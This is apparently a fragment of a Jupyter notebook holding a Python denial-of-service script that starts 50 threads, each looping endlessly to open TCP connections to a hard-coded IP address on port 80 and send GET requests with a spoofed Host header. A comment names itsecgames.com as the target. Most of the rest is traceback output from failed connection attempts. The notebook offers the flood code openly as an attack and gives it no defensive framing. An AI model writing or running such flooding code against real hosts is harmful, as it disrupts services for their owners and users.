      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-39:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-20:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n"
     ]
    }
   ],
   "source": [
    "import socket\n",
    "import threading\n",
    "\n",
    "target=\"184.168.131.241\" #attacking http://www.itsecgames.com/\n",
    "port=80\n",
    "fake_ip=\"124.34.21.78\"\n",
    "\n",
    "connected=0\n",
    "\n",
    "def attack():\n",
    "    \n",
    "    while True:\n",
    "        \n",
    "        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n",
    "        s.connect((target,port))\n",
    "        s.sendto((\"GET /\"+target+\" HTTP/1.1\\r\\n\").encode('ascii'),(target,port))\n",
    "        s.sendto((\"Host: \"+fake_ip+\"\\r\\n\\r\\n\").encode('ascii'),(target,port))\n",
    "        s.close()\n",
    "        \n",
    "        global connected\n",
    "        connected+=1\n",
    "        if(connected%100==0):\n",
    "            print(connected)\n",
    "\n",
    "for i in range(50):\n",
    "    thread=threading.Thread(target=attack)\n",
    "    thread.start()\n",
    "\n",
    "        \n",
    "    "
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.7.4"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
